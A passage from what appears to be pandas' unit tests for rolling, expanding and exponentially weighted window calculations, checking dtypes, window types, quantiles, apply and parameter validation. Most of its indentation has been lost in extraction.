}
return expects
def _create_dtype_data(self, dtype):
sr1 = Series(np.arange(5), dtype=dtype)
sr2 = Series(np.arange(10, 0, -2), dtype=dtype)
df = DataFrame(np.arange(10).reshape((5, 2)), dtype=dtype)
data = {
'sr1': sr1,
'sr2': sr2,
'df': df
}
return data
def _create_data(self):
self.data = self._create_dtype_data(self.dtype)
self.expects = self.get_expects()
def test_dtypes(self):
self._create_data()
for f_name, d_name in product(self.funcs.keys(), self.data.keys()):
f = self.funcs[f_name]
d = self.data[d_name]
exp = self.expects[d_name][f_name]
self.check_dtypes(f, f_name, d, d_name, exp)
def check_dtypes(self, f, f_name, d, d_name, exp):
roll = d.rolling(window=self.window)
result = f(roll)
tm.assert_almost_equal(result, exp)
class TestDtype_object(Dtype):
dtype = object
class Dtype_integer(Dtype):
pass
class TestDtype_int8(Dtype_integer):
dtype = np.int8
class TestDtype_int16(Dtype_integer):
dtype = np.int16
class TestDtype_int32(Dtype_integer):
dtype = np.int32
class TestDtype_int64(Dtype_integer):
dtype = np.int64
class Dtype_uinteger(Dtype):
pass
class TestDtype_uint8(Dtype_uinteger):
dtype = np.uint8
class TestDtype_uint16(Dtype_uinteger):
dtype = np.uint16
class TestDtype_uint32(Dtype_uinteger):
dtype = np.uint32
class TestDtype_uint64(Dtype_uinteger):
dtype = np.uint64
class Dtype_float(Dtype):
pass
class TestDtype_float16(Dtype_float):
dtype = np.float16
class TestDtype_float32(Dtype_float):
dtype = np.float32
class TestDtype_float64(Dtype_float):
dtype = np.float64
class TestDtype_category(Dtype):
dtype = 'category'
include_df = False
def _create_dtype_data(self, dtype):
sr1 = Series(range(5), dtype=dtype)
sr2 = Series(range(10, 0, -2), dtype=dtype)
data = {
'sr1': sr1,
'sr2': sr2
}
return data
class DatetimeLike(Dtype):
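    """Datetime-like dtypes only support rolling count at the moment; every
    other aggregation is expected to raise NotImplementedError.
    """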
def check_dtypes(self, f, f_name, d, d_name, exp):
roll = d.rolling(window=self.window)
if f_name == 'count':
result = f(roll)
tm.assert_almost_equal(result, exp)
else:
            # other methods are not implemented ATM
with pytest.raises(NotImplementedError):
f(roll)
class TestDtype_timedelta(DatetimeLike):
dtype = np.dtype('m8[ns]')
class TestDtype_datetime(DatetimeLike):
dtype = np.dtype('M8[ns]')
class TestDtype_datetime64UTC(DatetimeLike):
dtype = 'datetime64[ns, UTC]'
def _create_data(self):
pytest.skip("direct creation of extension dtype "
"datetime64[ns, UTC] is not supported ATM")
class TestMoments(Base):
def setup_method(self, method):
self._create_data()
def test_centered_axis_validation(self):
# ok
Series(np.ones(10)).rolling(window=3, center=True, axis=0).mean()
# bad axis
with pytest.raises(ValueError):
Series(np.ones(10)).rolling(window=3, center=True, axis=1).mean()
# ok ok
DataFrame(np.ones((10, 10))).rolling(window=3, center=True,
axis=0).mean()
DataFrame(np.ones((10, 10))).rolling(window=3, center=True,
axis=1).mean()
# bad axis
with pytest.raises(ValueError):
(DataFrame(np.ones((10, 10)))
.rolling(window=3, center=True, axis=2).mean())
def test_rolling_sum(self):
self._check_moment_func(np.nansum, name='sum',
zero_min_periods_equal=False)
def test_rolling_count(self):
counter = lambda x: np.isfinite(x).astype(float).sum()
self._check_moment_func(counter, name='count', has_min_periods=False,
fill_value=0)
def test_rolling_mean(self):
self._check_moment_func(np.mean, name='mean')
@td.skip_if_no_scipy
def test_cmov_mean(self):
# GH 8238
vals = np.array([6.95, 15.21, 4.72, 9.12, 13.81, 13.49, 16.68, 9.48,
10.63, 14.48])
result = Series(vals).rolling(5, center=True).mean()
expected = Series([np.nan, np.nan, 9.962, 11.27, 11.564, 12.516,
12.818, 12.952, np.nan, np.nan])
tm.assert_series_equal(expected, result)
@td.skip_if_no_scipy
def test_cmov_window(self):
# GH 8238
vals = np.array([6.95, 15.21, 4.72, 9.12, 13.81, 13.49, 16.68, 9.48,
10.63, 14.48])
result = Series(vals).rolling(5, win_type='boxcar', center=True).mean()
expected = Series([np.nan, np.nan, 9.962, 11.27, 11.564, 12.516,
12.818, 12.952, np.nan, np.nan])
tm.assert_series_equal(expected, result)
@td.skip_if_no_scipy
def test_cmov_window_corner(self):
# GH 8238
# all nan
vals = pd.Series([np.nan] * 10)
result = vals.rolling(5, center=True, win_type='boxcar').mean()
assert np.isnan(result).all()
# empty
vals = pd.Series([])
result = vals.rolling(5, center=True, win_type='boxcar').mean()
assert len(result) == 0
# shorter than window
vals = pd.Series(np.random.randn(5))
result = vals.rolling(10, win_type='boxcar').mean()
assert np.isnan(result).all()
assert len(result) == 5
@td.skip_if_no_scipy
def test_cmov_window_frame(self):
        # GH 8238
vals = np.array([[12.18, 3.64], [10.18, 9.16], [13.24, 14.61],
[4.51, 8.11], [6.15, 11.44], [9.14, 6.21],
[11.31, 10.67], [2.94, 6.51], [9.42, 8.39], [12.44,
7.34]])
xp = np.array([[np.nan, np.nan], [np.nan, np.nan], [9.252, 9.392],
[8.644, 9.906], [8.87, 10.208], [6.81, 8.588],
[7.792, 8.644], [9.05, 7.824], [np.nan, np.nan
], [np.nan, np.nan]])
# DataFrame
rs = DataFrame(vals).rolling(5, win_type='boxcar', center=True).mean()
tm.assert_frame_equal(DataFrame(xp), rs)
# invalid method
with pytest.raises(AttributeError):
(DataFrame(vals).rolling(5, win_type='boxcar', center=True)
.std())
# sum
xp = np.array([[np.nan, np.nan], [np.nan, np.nan], [46.26, 46.96],
[43.22, 49.53], [44.35, 51.04], [34.05, 42.94],
[38.96, 43.22], [45.25, 39.12], [np.nan, np.nan
], [np.nan, np.nan]])
rs = DataFrame(vals).rolling(5, win_type='boxcar', center=True).sum()
tm.assert_frame_equal(DataFrame(xp), rs)
@td.skip_if_no_scipy
def test_cmov_window_na_min_periods(self):
# min_periods
vals = Series(np.random.randn(10))
vals[4] = np.nan
vals[8] = np.nan
xp = vals.rolling(5, min_periods=4, center=True).mean()
rs = vals.rolling(5, win_type='boxcar', min_periods=4,
center=True).mean()
tm.assert_series_equal(xp, rs)
@td.skip_if_no_scipy
def test_cmov_window_regular(self, win_types):
# GH 8238
vals = np.array([6.95, 15.21, 4.72, 9.12, 13.81, 13.49, 16.68, 9.48,
10.63, 14.48])
xps = {
'hamming': [np.nan, np.nan, 8.71384, 9.56348, 12.38009, 14.03687,
13.8567, 11.81473, np.nan, np.nan],
'triang': [np.nan, np.nan, 9.28667, 10.34667, 12.00556, 13.33889,
13.38, 12.33667, np.nan, np.nan],
'barthann': [np.nan, np.nan, 8.4425, 9.1925, 12.5575, 14.3675,
14.0825, 11.5675, np.nan, np.nan],
'bohman': [np.nan, np.nan, 7.61599, 9.1764, 12.83559, 14.17267,
14.65923, 11.10401, np.nan, np.nan],
'blackmanharris': [np.nan, np.nan, 6.97691, 9.16438, 13.05052,
14.02156, 15.10512, 10.74574, np.nan, np.nan],
'nuttall': [np.nan, np.nan, 7.04618, 9.16786, 13.02671, 14.03559,
15.05657, 10.78514, np.nan, np.nan],
'blackman': [np.nan, np.nan, 7.73345, 9.17869, 12.79607, 14.20036,
14.57726, 11.16988, np.nan, np.nan],
'bartlett': [np.nan, np.nan, 8.4425, 9.1925, 12.5575, 14.3675,
14.0825, 11.5675, np.nan, np.nan]
}
xp = Series(xps[win_types])
rs = Series(vals).rolling(5, win_type=win_types, center=True).mean()
tm.assert_series_equal(xp, rs)
@td.skip_if_no_scipy
def test_cmov_window_regular_linear_range(self, win_types):
# GH 8238
vals = np.array(range(10), dtype=np.float)
xp = vals.copy()
xp[:2] = np.nan
xp[-2:] = np.nan
xp = Series(xp)
rs = Series(vals).rolling(5, win_type=win_types, center=True).mean()
tm.assert_series_equal(xp, rs)
@td.skip_if_no_scipy
def test_cmov_window_regular_missing_data(self, win_types):
# GH 8238
vals = np.array([6.95, 15.21, 4.72, 9.12, 13.81, 13.49, 16.68, np.nan,
10.63, 14.48])
xps = {
'bartlett': [np.nan, np.nan, 9.70333, 10.5225, 8.4425, 9.1925,
12.5575, 14.3675, 15.61667, 13.655],
'blackman': [np.nan, np.nan, 9.04582, 11.41536, 7.73345, 9.17869,
12.79607, 14.20036, 15.8706, 13.655],
'barthann': [np.nan, np.nan, 9.70333, 10.5225, 8.4425, 9.1925,
12.5575, 14.3675, 15.61667, 13.655],
'bohman': [np.nan, np.nan, 8.9444, 11.56327, 7.61599, 9.1764,
12.83559, 14.17267, 15.90976, 13.655],
'hamming': [np.nan, np.nan, 9.59321, 10.29694, 8.71384, 9.56348,
12.38009, 14.20565, 15.24694, 13.69758],
'nuttall': [np.nan, np.nan, 8.47693, 12.2821, 7.04618, 9.16786,
13.02671, 14.03673, 16.08759, 13.65553],
'triang': [np.nan, np.nan, 9.33167, 9.76125, 9.28667, 10.34667,
12.00556, 13.82125, 14.49429, 13.765],
'blackmanharris': [np.nan, np.nan, 8.42526, 12.36824, 6.97691,
9.16438, 13.05052, 14.02175, 16.1098, 13.65509]
}
xp = Series(xps[win_types])
rs = Series(vals).rolling(5, win_type=win_types, min_periods=3).mean()
tm.assert_series_equal(xp, rs)
@td.skip_if_no_scipy
def test_cmov_window_special(self, win_types_special):
# GH 8238
kwds = {
'kaiser': {'beta': 1.},
'gaussian': {'std': 1.},
'general_gaussian': {'power': 2., 'width': 2.}}
vals = np.array([6.95, 15.21, 4.72, 9.12, 13.81, 13.49, 16.68, 9.48,
10.63, 14.48])
xps = {
'gaussian': [np.nan, np.nan, 8.97297, 9.76077, 12.24763, 13.89053,
13.65671, 12.01002, np.nan, np.nan],
'general_gaussian': [np.nan, np.nan, 9.85011, 10.71589, 11.73161,
13.08516, 12.95111, 12.74577, np.nan, np.nan],
'kaiser': [np.nan, np.nan, 9.86851, 11.02969, 11.65161, 12.75129,
12.90702, 12.83757, np.nan, np.nan]
}
xp = Series(xps[win_types_special])
rs = Series(vals).rolling(
5, win_type=win_types_special, center=True).mean(
**kwds[win_types_special])
tm.assert_series_equal(xp, rs)
@td.skip_if_no_scipy
def test_cmov_window_special_linear_range(self, win_types_special):
# GH 8238
kwds = {
'kaiser': {'beta': 1.},
'gaussian': {'std': 1.},
'general_gaussian': {'power': 2., 'width': 2.},
'slepian': {'width': 0.5}}
vals = np.array(range(10), dtype=np.float)
xp = vals.copy()
xp[:2] = np.nan
xp[-2:] = np.nan
xp = Series(xp)
rs = Series(vals).rolling(
5, win_type=win_types_special, center=True).mean(
**kwds[win_types_special])
tm.assert_series_equal(xp, rs)
def test_rolling_median(self):
self._check_moment_func(np.median, name='median')
def test_rolling_min(self):
self._check_moment_func(np.min, name='min')
a = pd.Series([1, 2, 3, 4, 5])
result = a.rolling(window=100, min_periods=1).min()
expected = pd.Series(np.ones(len(a)))
tm.assert_series_equal(result, expected)
with pytest.raises(ValueError):
pd.Series([1, 2, 3]).rolling(window=3, min_periods=5).min()
def test_rolling_max(self):
self._check_moment_func(np.max, name='max')
a = pd.Series([1, 2, 3, 4, 5], dtype=np.float64)
b = a.rolling(window=100, min_periods=1).max()
tm.assert_almost_equal(a, b)
with pytest.raises(ValueError):
pd.Series([1, 2, 3]).rolling(window=3, min_periods=5).max()
@pytest.mark.parametrize('q', [0.0, .1, .5, .9, 1.0])
def test_rolling_quantile(self, q):
def scoreatpercentile(a, per):
values = np.sort(a, axis=0)
idx = int(per / 1. * (values.shape[0] - 1))
if idx == values.shape[0] - 1:
retval = values[-1]
else:
qlow = float(idx) / float(values.shape[0] - 1)
qhig = float(idx + 1) / float(values.shape[0] - 1)
vlow = values[idx]
vhig = values[idx + 1]
retval = vlow + (vhig - vlow) * (per - qlow) / (qhig - qlow)
return retval
def quantile_func(x):
return scoreatpercentile(x, q)
self._check_moment_func(quantile_func, name='quantile',
quantile=q)
def test_rolling_quantile_np_percentile(self):
        # GH 9413: Tests that rolling window's quantile default behavior
        # is analogous to NumPy's percentile
row = 10
col = 5
idx = pd.date_range('20100101', periods=row, freq='B')
df = DataFrame(np.random.rand(row * col).reshape((row, -1)), index=idx)
df_quantile = df.quantile([0.25, 0.5, 0.75], axis=0)
np_percentile = np.percentile(df, [25, 50, 75], axis=0)
tm.assert_almost_equal(df_quantile.values, np.array(np_percentile))
@pytest.mark.skipif(_np_version_under1p12,
reason='numpy midpoint interpolation is broken')
@pytest.mark.parametrize('quantile', [0.0, 0.1, 0.45, 0.5, 1])
@pytest.mark.parametrize('interpolation', ['linear', 'lower', 'higher',
'nearest', 'midpoint'])
@pytest.mark.parametrize('data', [[1., 2., 3., 4., 5., 6., 7.],
[8., 1., 3., 4., 5., 2., 6., 7.],
[0., np.nan, 0.2, np.nan, 0.4],
[np.nan, np.nan, np.nan, np.nan],
[np.nan, 0.1, np.nan, 0.3, 0.4, 0.5],
[0.5], [np.nan, 0.7, 0.6]])
def test_rolling_quantile_interpolation_options(self, quantile,
interpolation, data):
# Tests that rolling window's quantile behavior is analogous to
# Series' quantile for each interpolation option
s = Series(data)
q1 = s.quantile(quantile, interpolation)
q2 = s.expanding(min_periods=1).quantile(
quantile, interpolation).iloc[-1]
if np.isnan(q1):
assert np.isnan(q2)
else:
assert q1 == q2
def test_invalid_quantile_value(self):
data = np.arange(5)
s = Series(data)
with pytest.raises(ValueError, match="Interpolation 'invalid'"
" is not supported"):
s.rolling(len(data), min_periods=1).quantile(
0.5, interpolation='invalid')
def test_rolling_quantile_param(self):
ser = Series([0.0, .1, .5, .9, 1.0])
with pytest.raises(ValueError):
ser.rolling(3).quantile(-0.1)
with pytest.raises(ValueError):
ser.rolling(3).quantile(10.0)
with pytest.raises(TypeError):
ser.rolling(3).quantile('foo')
def test_rolling_apply(self, raw):
# suppress warnings about empty slices, as we are deliberately testing
# with a 0-length Series
with warnings.catch_warnings():
warnings.filterwarnings("ignore",
message=".*(empty slice|0 for slice).*",
category=RuntimeWarning)
def f(x):
return x[np.isfinite(x)].mean()
self._check_moment_func(np.mean, name='apply', func=f, raw=raw)
expected = Series([])
result = expected.rolling(10).apply(lambda x: x.mean(), raw=raw)
tm.assert_series_equal(result, expected)
# gh-8080
s = Series([None, None, None])
result = s.rolling(2, min_periods=0).apply(lambda x: len(x), raw=raw)
expected = Series([1., 2., 2.])
tm.assert_series_equal(result, expected)
result = s.rolling(2, min_periods=0).apply(len, raw=raw)
tm.assert_series_equal(result, expected)
@pytest.mark.parametrize('klass', [Series, DataFrame])
@pytest.mark.parametrize(
'method', [lambda x: x.rolling(window=2), lambda x: x.expanding()])
def test_apply_future_warning(self, klass, method):
# gh-5071
s = klass(np.arange(3))
with tm.assert_produces_warning(FutureWarning):
method(s).apply(lambda x: len(x))
def test_rolling_apply_out_of_bounds(self, raw):
# gh-1850
vals = pd.Series([1, 2, 3, 4])
result = vals.rolling(10).apply(np.sum, raw=raw)
assert result.isna().all()
result = vals.rolling(10, min_periods=1).apply(np.sum, raw=raw)
expected = pd.Series([1, 3, 6, 10], dtype=float)
tm.assert_almost_equal(result, expected)
@pytest.mark.parametrize('window', [2, '2s'])
def test_rolling_apply_with_pandas_objects(self, window):
# 5071
df = pd.DataFrame({'A': np.random.randn(5),
'B': np.random.randint(0, 10, size=5)},
index=pd.date_range('20130101', periods=5, freq='s'))
        # we have an equally spaced timeseries index
        # so simulate removing the first period
def f(x):
if x.index[0] == df.index[0]:
return np.nan
return x.iloc[-1]
result = df.rolling(window).apply(f, raw=False)
expected = df.iloc[2:].reindex_like(df)
tm.assert_frame_equal(result, expected)
with pytest.raises(AttributeError):
df.rolling(window).apply(f, raw=True)
def test_rolling_std(self):
self._check_moment_func(lambda x: np.std(x, ddof=1),
name='std')
self._check_moment_func(lambda x: np.std(x, ddof=0),
name='std', ddof=0)
def test_rolling_std_1obs(self):
vals = pd.Series([1., 2., 3., 4., 5.])
result = vals.rolling(1, min_periods=1).std()
expected = pd.Series([np.nan] * 5)
tm.assert_series_equal(result, expected)
result = vals.rolling(1, min_periods=1).std(ddof=0)
expected = pd.Series([0.] * 5)
tm.assert_series_equal(result, expected)
result = (pd.Series([np.nan, np.nan, 3, 4, 5])
.rolling(3, min_periods=2).std())
assert np.isnan(result[2])
def test_rolling_std_neg_sqrt(self):
# unit test from Bottleneck
# Test move_nanstd for neg sqrt.
a = pd.Series([0.0011448196318903589, 0.00028718669878572767,
0.00028718669878572767, 0.00028718669878572767,
0.00028718669878572767])
b = a.rolling(window=3).std()
assert np.isfinite(b[2:]).all()
b = a.ewm(span=3).std()
assert np.isfinite(b[2:]).all()
def test_rolling_var(self):
self._check_moment_func(lambda x: np.var(x, ddof=1),
name='var')
self._check_moment_func(lambda x: np.var(x, ddof=0),
name='var', ddof=0)
@td.skip_if_no_scipy
def test_rolling_skew(self):
from scipy.stats import skew
self._check_moment_func(lambda x: skew(x, bias=False), name='skew')
@td.skip_if_no_scipy
def test_rolling_kurt(self):
from scipy.stats import kurtosis
self._check_moment_func(lambda x: kurtosis(x, bias=False),
name='kurt')
    def _check_moment_func(self, static_comp, name, has_min_periods=True,
                           has_center=True, has_time_rule=True,
                           fill_value=None, zero_min_periods_equal=True,
                           **kwargs):
        # resolve `raw` locally so the DataFrame.apply calls further down use
        # an explicit bool instead of silently picking up the module-level
        # `raw` fixture function of the same name
        raw = kwargs.get('raw', True)
        def get_result(obj, window, min_periods=None, center=False):
            r = obj.rolling(window=window, min_periods=min_periods,
                            center=center)
            return getattr(r, name)(**kwargs)
series_result = get_result(self.series, window=50)
assert isinstance(series_result, Series)
tm.assert_almost_equal(series_result.iloc[-1],
static_comp(self.series[-50:]))
frame_result = get_result(self.frame, window=50)
assert isinstance(frame_result, DataFrame)
tm.assert_series_equal(
frame_result.iloc[-1, :],
self.frame.iloc[-50:, :].apply(static_comp, axis=0, raw=raw),
check_names=False)
# check time_rule works
if has_time_rule:
win = 25
minp = 10
series = self.series[::2].resample('B').mean()
frame = self.frame[::2].resample('B').mean()
if has_min_periods:
series_result = get_result(series, window=win,
min_periods=minp)
frame_result = get_result(frame, window=win,
min_periods=minp)
else:
series_result = get_result(series, window=win)
frame_result = get_result(frame, window=win)
last_date = series_result.index[-1]
prev_date = last_date - 24 * offsets.BDay()
trunc_series = self.series[::2].truncate(prev_date, last_date)
trunc_frame = self.frame[::2].truncate(prev_date, last_date)
tm.assert_almost_equal(series_result[-1],
static_comp(trunc_series))
tm.assert_series_equal(frame_result.xs(last_date),
trunc_frame.apply(static_comp, raw=raw),
check_names=False)
# excluding NaNs correctly
obj = Series(randn(50))
obj[:10] = np.NaN
obj[-10:] = np.NaN
if has_min_periods:
result = get_result(obj, 50, min_periods=30)
tm.assert_almost_equal(result.iloc[-1], static_comp(obj[10:-10]))
# min_periods is working correctly
result = get_result(obj, 20, min_periods=15)
assert isna(result.iloc[23])
assert not isna(result.iloc[24])
assert not isna(result.iloc[-6])
assert isna(result.iloc[-5])
obj2 = Series(randn(20))
result = get_result(obj2, 10, min_periods=5)
assert isna(result.iloc[3])
assert notna(result.iloc[4])
if zero_min_periods_equal:
# min_periods=0 may be equivalent to min_periods=1
result0 = get_result(obj, 20, min_periods=0)
result1 = get_result(obj, 20, min_periods=1)
tm.assert_almost_equal(result0, result1)
else:
result = get_result(obj, 50)
tm.assert_almost_equal(result.iloc[-1], static_comp(obj[10:-10]))
# window larger than series length (#7297)
if has_min_periods:
for minp in (0, len(self.series) - 1, len(self.series)):
result = get_result(self.series, len(self.series) + 1,
min_periods=minp)
expected = get_result(self.series, len(self.series),
min_periods=minp)
nan_mask = isna(result)
tm.assert_series_equal(nan_mask, isna(expected))
nan_mask = ~nan_mask
tm.assert_almost_equal(result[nan_mask],
expected[nan_mask])
else:
result = get_result(self.series, len(self.series) + 1)
expected = get_result(self.series, len(self.series))
nan_mask = isna(result)
tm.assert_series_equal(nan_mask, isna(expected))
nan_mask = ~nan_mask
tm.assert_almost_equal(result[nan_mask], expected[nan_mask])
# check center=True
if has_center:
if has_min_periods:
result = get_result(obj, 20, min_periods=15, center=True)
expected = get_result(
pd.concat([obj, Series([np.NaN] * 9)]), 20,
min_periods=15)[9:].reset_index(drop=True)
else:
result = get_result(obj, 20, center=True)
expected = get_result(
pd.concat([obj, Series([np.NaN] * 9)]),
20)[9:].reset_index(drop=True)
tm.assert_series_equal(result, expected)
        # shifted index
s = ['x%d' % x for x in range(12)]
if has_min_periods:
minp = 10
series_xp = get_result(
self.series.reindex(list(self.series.index) + s),
window=25,
min_periods=minp).shift(-12).reindex(self.series.index)
frame_xp = get_result(
self.frame.reindex(list(self.frame.index) + s),
window=25,
min_periods=minp).shift(-12).reindex(self.frame.index)
series_rs = get_result(self.series, window=25,
min_periods=minp, center=True)
frame_rs = get_result(self.frame, window=25, min_periods=minp,
center=True)
else:
series_xp = get_result(
self.series.reindex(list(self.series.index) + s),
window=25).shift(-12).reindex(self.series.index)
frame_xp = get_result(
self.frame.reindex(list(self.frame.index) + s),
window=25).shift(-12).reindex(self.frame.index)
series_rs = get_result(self.series, window=25, center=True)
frame_rs = get_result(self.frame, window=25, center=True)
if fill_value is not None:
series_xp = series_xp.fillna(fill_value)
frame_xp = frame_xp.fillna(fill_value)
tm.assert_series_equal(series_xp, series_rs)
tm.assert_frame_equal(frame_xp, frame_rs)
def test_ewma(self):
self._check_ew(name='mean')
vals = pd.Series(np.zeros(1000))
vals[5] = 1
result = vals.ewm(span=100, adjust=False).mean().sum()
assert np.abs(result - 1) < 1e-2
@pytest.mark.parametrize('adjust', [True, False])
@pytest.mark.parametrize('ignore_na', [True, False])
def test_ewma_cases(self, adjust, ignore_na):
# try adjust/ignore_na args matrix
s = Series([1.0, 2.0, 4.0, 8.0])
if adjust:
expected = Series([1.0, 1.6, 2.736842, 4.923077])
else:
expected = Series([1.0, 1.333333, 2.222222, 4.148148])
result = s.ewm(com=2.0, adjust=adjust, ignore_na=ignore_na).mean()
tm.assert_series_equal(result, expected)
def test_ewma_nan_handling(self):
s = Series([1.] + [np.nan] * 5 + [1.])
result = s.ewm(com=5).mean()
tm.assert_series_equal(result, Series([1.] * len(s)))
s = Series([np.nan] * 2 + [1.] + [np.nan] * 2 + [1.])
result = s.ewm(com=5).mean()
tm.assert_series_equal(result, Series([np.nan] * 2 + [1.] * 4))
# GH 7603
s0 = Series([np.nan, 1., 101.])
s1 = Series([1., np.nan, 101.])
s2 = Series([np.nan, 1., np.nan, np.nan, 101., np.nan])
s3 = Series([1., np.nan, 101., 50.])
com = 2.
alpha = 1. / (1. + com)
def simple_wma(s, w):
return (s.multiply(w).cumsum() / w.cumsum()).fillna(method='ffill')
for (s, adjust, ignore_na, w) in [
(s0, True, False, [np.nan, (1. - alpha), 1.]),
(s0, True, True, [np.nan, (1. - alpha), 1.]),
(s0, False, False, [np.nan, (1. - alpha), alpha]),
(s0, False, True, [np.nan, (1. - alpha), alpha]),
(s1, True, False, [(1. - alpha) ** 2, np.nan, 1.]),
(s1, True, True, [(1. - alpha), np.nan, 1.]),
(s1, False, False, [(1. - alpha) ** 2, np.nan, alpha]),
(s1, False, True, [(1. - alpha), np.nan, alpha]),
(s2, True, False, [np.nan, (1. - alpha) **
3, np.nan, np.nan, 1., np.nan]),
(s2, True, True, [np.nan, (1. - alpha),
np.nan, np.nan, 1., np.nan]),
(s2, False, False, [np.nan, (1. - alpha) **
3, np.nan, np.nan, alpha, np.nan]),
(s2, False, True, [np.nan, (1. - alpha),
np.nan, np.nan, alpha, np.nan]),
(s3, True, False, [(1. - alpha) **
3, np.nan, (1. - alpha), 1.]),
(s3, True, True, [(1. - alpha) **
2, np.nan, (1. - alpha), 1.]),
(s3, False, False, [(1. - alpha) ** 3, np.nan,
(1. - alpha) * alpha,
alpha * ((1. - alpha) ** 2 + alpha)]),
(s3, False, True, [(1. - alpha) ** 2,
np.nan, (1. - alpha) * alpha, alpha])]:
expected = simple_wma(s, Series(w))
result = s.ewm(com=com, adjust=adjust, ignore_na=ignore_na).mean()
tm.assert_series_equal(result, expected)
if ignore_na is False:
# check that ignore_na defaults to False
result = s.ewm(com=com, adjust=adjust).mean()
tm.assert_series_equal(result, expected)
def test_ewmvar(self):
self._check_ew(name='var')
def test_ewmvol(self):
self._check_ew(name='vol')
def test_ewma_span_com_args(self):
A = self.series.ewm(com=9.5).mean()
B = self.series.ewm(span=20).mean()
tm.assert_almost_equal(A, B)
with pytest.raises(ValueError):
self.series.ewm(com=9.5, span=20)
with pytest.raises(ValueError):
self.series.ewm().mean()
def test_ewma_halflife_arg(self):
A = self.series.ewm(com=13.932726172912965).mean()
B = self.series.ewm(halflife=10.0).mean()
tm.assert_almost_equal(A, B)
with pytest.raises(ValueError):
self.series.ewm(span=20, halflife=50)
with pytest.raises(ValueError):
self.series.ewm(com=9.5, halflife=50)
with pytest.raises(ValueError):
self.series.ewm(com=9.5, span=20, halflife=50)
with pytest.raises(ValueError):
self.series.ewm()
def test_ewm_alpha(self):
# GH 10789
s = Series(self.arr)
a = s.ewm(alpha=0.61722699889169674).mean()
b = s.ewm(com=0.62014947789973052).mean()
c = s.ewm(span=2.240298955799461).mean()
d = s.ewm(halflife=0.721792864318).mean()
tm.assert_series_equal(a, b)
tm.assert_series_equal(a, c)
tm.assert_series_equal(a, d)
def test_ewm_alpha_arg(self):
# GH 10789
s = self.series
with pytest.raises(ValueError):
s.ewm()
with pytest.raises(ValueError):
s.ewm(com=10.0, alpha=0.5)
with pytest.raises(ValueError):
s.ewm(span=10.0, alpha=0.5)
with pytest.raises(ValueError):
s.ewm(halflife=10.0, alpha=0.5)
def test_ewm_domain_checks(self):
# GH 12492
s = Series(self.arr)
# com must satisfy: com >= 0
pytest.raises(ValueError, s.ewm, com=-0.1)
s.ewm(com=0.0)
s.ewm(com=0.1)
# span must satisfy: span >= 1
pytest.raises(ValueError, s.ewm, span=-0.1)
pytest.raises(ValueError, s.ewm, span=0.0)
pytest.raises(ValueError, s.ewm, span=0.9)
s.ewm(span=1.0)
s.ewm(span=1.1)
# halflife must satisfy: halflife > 0
pytest.raises(ValueError, s.ewm, halflife=-0.1)
pytest.raises(ValueError, s.ewm, halflife=0.0)
s.ewm(halflife=0.1)
# alpha must satisfy: 0 < alpha <= 1
pytest.raises(ValueError, s.ewm, alpha=-0.1)
pytest.raises(ValueError, s.ewm, alpha=0.0)
s.ewm(alpha=0.1)
s.ewm(alpha=1.0)
pytest.raises(ValueError, s.ewm, alpha=1.1)
@pytest.mark.parametrize('method', ['mean', 'vol', 'var'])
def test_ew_empty_series(self, method):
vals = pd.Series([], dtype=np.float64)
ewm = vals.ewm(3)
result = getattr(ewm, method)()
tm.assert_almost_equal(result, vals)
def _check_ew(self, name=None, preserve_nan=False):
series_result = getattr(self.series.ewm(com=10), name)()
assert isinstance(series_result, Series)
frame_result = getattr(self.frame.ewm(com=10), name)()
assert type(frame_result) == DataFrame
result = getattr(self.series.ewm(com=10), name)()
if preserve_nan:
assert result[self._nan_locs].isna().all()
# excluding NaNs correctly
arr = randn(50)
arr[:10] = np.NaN
arr[-10:] = np.NaN
s = Series(arr)
# check min_periods
# GH 7898
result = getattr(s.ewm(com=50, min_periods=2), name)()
assert result[:11].isna().all()
assert not result[11:].isna().any()
for min_periods in (0, 1):
result = getattr(s.ewm(com=50, min_periods=min_periods), name)()
if name == 'mean':
assert result[:10].isna().all()
assert not result[10:].isna().any()
else:
# ewm.std, ewm.vol, ewm.var (with bias=False) require at least
# two values
assert result[:11].isna().all()
assert not result[11:].isna().any()
# check series of length 0
result = getattr(Series().ewm(com=50, min_periods=min_periods),
name)()
tm.assert_series_equal(result, Series())
# check series of length 1
result = getattr(Series([1.]).ewm(50, min_periods=min_periods),
name)()
if name == 'mean':
tm.assert_series_equal(result, Series([1.]))
else:
# ewm.std, ewm.vol, ewm.var with bias=False require at least
# two values
tm.assert_series_equal(result, Series([np.NaN]))
# pass in ints
result2 = getattr(Series(np.arange(50)).ewm(span=10), name)()
assert result2.dtype == np.float_
class TestPairwise(object):
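    """Pairwise cov/corr tests over DataFrames with awkward column labels
    (duplicates, mixed int/float/str) to make sure the MultiIndex results
    line up regardless of column ordering.
    """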
# GH 7738
df1s = [DataFrame([[2, 4], [1, 2], [5, 2], [8, 1]], columns=[0, 1]),
DataFrame([[2, 4], [1, 2], [5, 2], [8, 1]], columns=[1, 0]),
DataFrame([[2, 4], [1, 2], [5, 2], [8, 1]], columns=[1, 1]),
DataFrame([[2, 4], [1, 2], [5, 2], [8, 1]],
columns=['C', 'C']),
DataFrame([[2, 4], [1, 2], [5, 2], [8, 1]], columns=[1., 0]),
DataFrame([[2, 4], [1, 2], [5, 2], [8, 1]], columns=[0., 1]),
DataFrame([[2, 4], [1, 2], [5, 2], [8, 1]], columns=['C', 1]),
DataFrame([[2., 4.], [1., 2.], [5., 2.], [8., 1.]],
columns=[1, 0.]),
DataFrame([[2, 4.], [1, 2.], [5, 2.], [8, 1.]],
columns=[0, 1.]),
DataFrame([[2, 4], [1, 2], [5, 2], [8, 1.]],
columns=[1., 'X']), ]
df2 = DataFrame([[None, 1, 1], [None, 1, 2],
[None, 3, 2], [None, 8, 1]], columns=['Y', 'Z', 'X'])
s = Series([1, 1, 3, 8])
def compare(self, result, expected):
# since we have sorted the results
# we can only compare non-nans
result = result.dropna().values
expected = expected.dropna().values
tm.assert_numpy_array_equal(result, expected, check_dtype=False)
@pytest.mark.parametrize('f', [lambda x: x.cov(), lambda x: x.corr()])
def test_no_flex(self, f):
# DataFrame methods (which do not call _flex_binary_moment())
results = [f(df) for df in self.df1s]
for (df, result) in zip(self.df1s, results):
tm.assert_index_equal(result.index, df.columns)
tm.assert_index_equal(result.columns, df.columns)
for i, result in enumerate(results):
if i > 0:
self.compare(result, results[0])
@pytest.mark.parametrize(
'f', [lambda x: x.expanding().cov(pairwise=True),
lambda x: x.expanding().corr(pairwise=True),
lambda x: x.rolling(window=3).cov(pairwise=True),
lambda x: x.rolling(window=3).corr(pairwise=True),
lambda x: x.ewm(com=3).cov(pairwise=True),
